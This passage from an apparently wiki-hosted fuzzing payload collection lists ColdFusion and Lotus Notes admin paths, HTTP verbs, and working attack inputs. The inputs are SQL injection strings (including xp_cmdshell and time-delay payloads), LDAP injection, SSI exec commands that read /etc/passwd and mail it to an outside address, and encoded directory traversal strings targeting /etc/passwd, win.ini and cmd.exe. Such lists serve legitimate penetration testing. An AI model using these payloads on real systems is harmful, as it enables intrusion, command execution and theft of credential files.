.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  ll HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
